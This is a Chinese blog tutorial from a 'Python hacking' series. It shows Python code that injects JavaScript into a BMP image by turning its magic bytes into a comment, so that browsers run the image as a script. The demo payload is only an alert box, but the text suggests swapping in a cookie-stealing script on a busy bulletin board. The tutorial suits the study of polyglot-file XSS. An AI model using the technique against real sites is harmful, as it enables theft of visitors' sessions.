python黑客攻防(三)图片文件攻击

最新推荐文章于 2024-06-13 10:04:48 发布
最新推荐文章于 2024-06-13 10:04:48 发布
阅读量1.7k 收藏 12
点赞数 2
分类专栏: Python黑客编程 文章标签: python Cisco 从入门到精通 网络安全 计算机类
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43681532/article/details/107208143
版权

注:本教程仅供学习交流,未经允许禁止转载。请勿用于非法用途,后果自负。大神勿喷。喜欢的小伙伴可以关注我的微信公众号:黑客帮

前言:
本篇文章参考自《Python黑客攻防入门》,演示向一张位图(bmp后缀的图片文件)注入JavaScript脚本。

教程:

准备一张“.bmp”后缀的图片文件,可网上下载,也可自己创建。这里我用画图创建了一张,放在D盘,用010Editor编辑器打开,(010Editor编辑器可自行百度下载)可以看到图片的16进制数。42 和 4D分别对应B,M;这就是用于识别位图的“魔数”。
在这里插入图片描述编写简单的JavaScript脚本,如下,运行脚本会弹出警告框。下面的js文件和HTML文件都是通过pycharm创建的。

alert("Hello Python!")

在这里插入图片描述编写向图片插入JavaScript脚本的python代码。图片建议不要放在C盘桌面,以免可能出错,运行代码后010Editor编辑器会弹出警告。点击重新加载,可以看到数据的最下面有刚才编写的JavaScript脚本。

fname = r"D:\1.bmp"
pfile = open(fname, "r+b") #以二进制打开读取图片
buff = pfile.read()
#替换掉可能引发错误的*/
buff.replace(b'\x2A\x2F',b'\x00\x00')
pfile.close()

pfile = open(fname, "w+b")
pfile.write(buff)
#以起始位置为基准,光标后移两位
pfile.seek(2,0)
pfile.write(b'\x2F\x2A') #插入注释,在“魔数”后插入代表注释开始的标识
pfile.close()   #“魔数”正确,浏览器即可识别为位图文件,无论图像数据是否损坏

pfile = open(fname,"ab")
pfile.write(b'\xFF\x2A\x2F\x3D\x31\x3B')
pfile.write(open('hello.js', 'rb').read()) #插入js脚本
pfile.close()
print('插入成功!')

在这里插入图片描述在这里插入图片描述编写HTML代码,然后用Microsoft Edge浏览器打开,出现了提示框,说明插入的JavaScript脚本运行了。

<img src="D:\1.bmp" />    
<script src="D:\1.bmp"></script>

在这里插入图片描述在这里插入图片描述总结:
示例中编写的hello.js脚本很简单,只简单弹出提示框。如果向位图插人的是段获取PC中的Cookie并传送到第三方网站的脚本,将这种位图上传到用户阅读量很大的公告栏后,用户阅读公告时,其Cookie信息就会被传送到黑客指定的网站。黑客利用这些信息可以发动XSS攻击。

肥胖喵
关注
  • 2
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
image xss 1.图片发生xss攻击的条件、原因及对策
microad_liy的专栏
08-30 8552
发生image xss的条件   ・ IE6、IE7    ・图片的magic bite和content_type不一致   (解释①图片magic bite) 发生image xss的原因   Ie在进行content种别判断时,不单考虑content_type,还
chatgpt赋能pythonPython黑客教程:入门指南
m0_56069948的博客
07-01 368
本文由chatgpt生成,文章没有在chatgpt生成的基础上进行任何的修改。以上只是chatgpt能力的冰山一角。作为通用的Aigc大模型,只是展现它原本的实力。对于颠覆工作方式的ChatGPT,应该选择拥抱而不是抗拒,未来属于“会用”AI的人。🧡AI职场汇报智能办公文案写作效率提升教程 🧡专注于AI+职场+办公方向。下图是课程的整体大纲下图是AI职场汇报智能办公文案写作效率提升教程中用到的ai工具。
Python网络安全项目开发实战_看清Web攻击_编程案例解析实例详解课程教程.pdf
04-27
本章来看一下 Web 攻击到底是怎样的,进而更好地防止自己遭到 Web 攻击。本章仅讲解攻击的过程,不针对任何具体的主机或服务器。不管是国内巨头 BAT,还是国外的 Google、MicroSoft、FaceBook……都不能保证自己万无一失(即使主站没问题,还有众多的分站),其他的中小型企业就更不用说了。这个不是硬件问题,也不是技术问题。只要是人在维护网站,必定会有漏洞。不管是针对哪个网站,只要认真地寻找、检测总会有机会。即使得不到控制权,也可能造成一定的破坏。所以,我们想保护自己的网站,也要像黑客一样,查找并堵上这些漏洞。
Python实现黑客代码
2401_84205765的博客
06-13 275
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
XSS测试用例
q908544703的博客
05-28 1974
下载原件地址:链接:https://pan.baidu.com/s/1HQu4daTdxfgTDWAyXUD5lA 提取码:5mw1 在这里插入图片描述
零基础Python黑客工具入门
JAVAmonster12的博客
07-30 2541
为了满足新手对Python的追求,特写了个初级Python入门工具。第一期写了个初级工具,希望新手看完以后可以对Python的脚本有一个基本了解。一件套pythondrequests模块,构造一个whois信息收集器;二件套Python编写一个arp断网攻击件套目录信息收集。一件套前言带给想写项目但无从下手的朋友们,这些脚本都比较容易理解简单梳理一下此工具需要具备哪些功能。脚本获取信息如下IP信息子域名备案注册人邮箱地址电话DNS具体操作如下。...
黑客入门教程(非常详细)从零基础入门到精通,看完这一篇就够了
xiangxueerfei的博客
09-22 1616
首先要明白啊,我们现在说的黑客不是那种窃取别人信息、攻击别人系统的黑客,说的是调试和分析计算机安全系统的网络安全工程师。黑客技术的核心就是渗透攻防技术,是为了证明网络防御按照预期计划正常运行而提供的一种机制。就是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法。去一个地方就要学会人家的家乡话,不然就不知所云了。就好比:肉鸡是什么?
黑客攻防-请看介绍
09-14
标题 "黑客攻防-请看介绍" 涉及到的是网络安全领域中的一个重要主题——黑客攻击与防御。在这个主题下,我们主要探讨四个关键的知识点: 1. **基础知识**:这是学习任何领域的基础,对于黑客攻防也不例外。基础知识...
基于Python的网络黑客攻击技术分析研究与防范策略.pdf
06-28
基于Python的网络黑客攻击技术分析研究与防范策略.pdf
linux 基础黑客技术 攻防
03-19
网络信息安全 攻防技术指导 攻防linux 系统,linux系统基础 黑客技术知识
黑客防线攻防入门
11-07
随着信息技术的发展,信息安全,网络安全,电脑安全,这样的字眼走入我们的视野中,这是一本关于黑客的书,能帮助你了解黑客常见的入侵手段,能帮助你更好的防护你的电脑。。
black hat python + python 源码剖析
10-09
《黑帽Python》和Python源码剖析这两本书是IT领域中关于网络安全、Web安全和攻防技术的重要参考资料,尤其适合那些希望深入理解Python语言的人。接下来,我们将详细探讨这两个主题中的核心知识点。 首先,让我们...
黑客攻防学习笔记 入门篇
Python栈
03-02 479
黑客的培养,需要很多来自外国的教程,所以他们一定英语很好,也懂网络安全基本术语,比如肉鸡,挂马和后门之的,也得掌握ARP、TCPIP等正式的术语;端口可以理解成门,或者通道,当你需要一个服务时,要通过端口这个门,访问一个网页时,在浏览器输入一个地址,然后,这个地址被转换成IP地址,然后再访问相应服务器的端口后服务器返回给你想访问的页面, 我们访问网站,也就是通过的80端口,选定的端口用来提供相应的服务,常用的端口有,本章我们的关键词是:黑客,IP地址,端口,系统进程,黑客常用的DOS命令。
保姆级黑客入门教程《Python安全攻防:渗透测试实战指南》极致经典,学完即可入狱!
xiangxue666的博客
02-25 623
保姆级黑客入门教程《Python安全攻防:渗透测试实战指南》极致经典,学完即可入狱!
python网络安全攻击与防御的工具(附零基础学习资料)
Java癫疯的博客
11-09 1746
python网络安全攻击与防御的工具(附零基础学习资料)
python网络攻击总参部_注入攻击Python语言中的十个常见安全漏洞,附修复及避免方法...
weixin_39704971的博客
11-23 579
编写安全的代码很困难,当你学习一门编程语言、一个模块或框架时,你会学习其使用方法。在考虑安全性时,你需要考虑如何避免代码被滥用,Python也不例外,即使在标准库中,也存在着许多糟糕的实例。然而,许多 Python 开发人员却根本不知道这些。以下是我总结的10个Python常见安全漏洞,排名不分先后。1、输入注入注入攻击影响广泛且很常见,注入有很多种,它们影响所有的语言、框架和环境。SQL 注入...
python攻击网站的方式_利用HTTP Basic认证进行钓鱼攻击python脚本
weixin_39646658的博客
11-24 520
1) 什么是HTTP Basic认证HTTP Basic认证是由web服务器提供的,一种轻便的身份校验方式。访问某些敏感资源时,服务器将要求输入账号、密码进行校验,通过之后才可继续访问,如下图所示:2) 如何使用HTTP Basic认证钓鱼最常见的一种攻击方式,是在访问量大、又能够插入第图片的页面中,插入由我们构造的超链接。这样,当别人访问页面时,浏览器就可能弹出对话框来(Chrome不会触发...
python安全开发第章第四节--cc攻击原理
莫慌的博客
10-06 1077
Python 安全开发cc攻击
黑客大佬教你如何用python黑掉邻居的WiFi以及网站,附教程
weixin_55154866的博客
02-24 3714
流量不够用怎么办? 随着时代的发展,流量也是越来越不够用了,办无限网卡吗?月租太贵不划算,还是用Wi-Fi舒服,不用担心流量用没了
python黑客攻防入门
最新发布
07-04
"Python 黑客攻防入门"通常指的是网络安全领域的学习资源,它旨在帮助读者理解如何使用Python这门语言来进行安全测试、漏洞分析和防御措施。以下是一些基本概念和内容概述: 1. **基础知识**:首先,你需要了解Python的基础语法,如变量、数据型、控制流等,因为这些是攻防操作的基础。 2. **网络工具**:Python中有许多库,如Scapy(用于网络协议分析)、Nmap(网络扫描)和Metasploit(渗透测试框架),可以帮助你理解和实践网络攻击和防御。 3. **漏洞利用**:学习如何识别常见的软件漏洞(如SQL注入、跨站脚本等),并使用Python编写简单的exploits(利用代码)。 4. **道德黑客(Ethical Hacking)**:虽然名为“入门”,但它强调的是合法的安全评估,而不是恶意破坏。会讲解渗透测试许可证和合规性的重要性。 5. **防御技术**:包括防火墙设置、入侵检测系统(IDS/IPS)配置,以及Python在创建Web应用防护和日志分析中的应用。 6. **加密与解密**:了解基础的加密原理,并用Python处理常见的加密算法和密码学概念。 相关问题: 1. Python中哪些库常用于网络安全攻防? 2. 初学者应该如何平衡Python黑客攻防的学习和伦理准则? 3. 在实际工作中,Python黑客攻防的知识有哪些应用场景?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值